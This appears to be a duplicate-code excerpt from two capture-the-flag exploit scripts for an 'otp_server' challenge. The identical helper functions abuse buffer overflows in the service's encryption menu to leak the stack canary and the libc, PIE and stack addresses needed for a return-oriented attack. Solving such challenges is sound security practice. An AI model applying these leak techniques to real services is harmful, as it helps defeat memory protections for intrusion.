pwnables/otp_server/exploit.py [32:78]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_key(value):
  p.readuntil(">>> ")
  p.sendline("1")
  p.readuntil("Enter key:\n")
  p.sendline(value)


def encrypt_message(message):
  p.readuntil(">>> ")
  p.sendline("2")
  p.readuntil("Enter message to encrypt:\n")
  p.send('Q'*256)


def leak_stack():
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  stack = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n");

  canary = u64(stack[264:272])
  pie_leak = u64(stack[272:280])
  libc_leak = u64(stack[280:288])
  stack_leak= u64(stack[296:304])

  return stack, canary, libc_leak, pie_leak, stack_leak


def leak_offset_byte(offset):
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  stack = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n");

  byte = u8(stack[263 + offset])
  return byte


def write_offset(offset):
  set_key("B" * (offset) + "\x00")
  encrypt_message("A"*256)

  print("written byte: " + hex(leak_offset_byte(offset)))

  return leak_offset_byte(offset)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



pwnables/otp_server/exploit2.py [32:78]:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def set_key(value):
  p.readuntil(">>> ")
  p.sendline("1")
  p.readuntil("Enter key:\n")
  p.sendline(value)


def encrypt_message(message):
  p.readuntil(">>> ")
  p.sendline("2")
  p.readuntil("Enter message to encrypt:\n")
  p.send('Q'*256)


def leak_stack():
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  stack = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n");

  canary = u64(stack[264:272])
  pie_leak = u64(stack[272:280])
  libc_leak = u64(stack[280:288])
  stack_leak= u64(stack[296:304])

  return stack, canary, libc_leak, pie_leak, stack_leak


def leak_offset_byte(offset):
  set_key("Q"*256)
  encrypt_message("A"*256)

  p.readuntil("----- BEGIN ROP ENCRYPTED MESSAGE -----\n")
  stack = p.readuntil("----- END ROP ENCRYPTED MESSAGE -----\n");

  byte = u8(stack[263 + offset])
  return byte


def write_offset(offset):
  set_key("B" * (offset) + "\x00")
  encrypt_message("A"*256)

  print("written byte: " + hex(leak_offset_byte(offset)))

  return leak_offset_byte(offset)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -